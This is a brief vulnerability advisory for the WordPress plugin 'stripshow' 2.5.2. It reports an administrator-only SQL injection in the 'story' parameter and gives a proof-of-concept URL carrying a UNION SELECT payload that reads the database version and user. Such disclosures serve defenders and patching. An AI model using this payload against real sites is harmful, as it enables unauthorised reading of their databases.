Wp Plugin Stripshow

Plugin Details

Plugin Name: wp-plugin : stripshow
Effected Version : 2.5.2 (and most probably lower version's if any)
Vulnerability : Injection
Minimum Level of Access Required : Administrator
CVE Number :
Identified by : Anantshri
WPScan Reference URL

Disclosure Timeline

Technical Details

http://localhost/wp-admin/admin.php?page=stripshow-storylines&action=edit&story=2%20union%20select%201,@@version,user(),4,5

Here the parameter “story” is susceptible. However the risk is limited as this is only possible for administrators.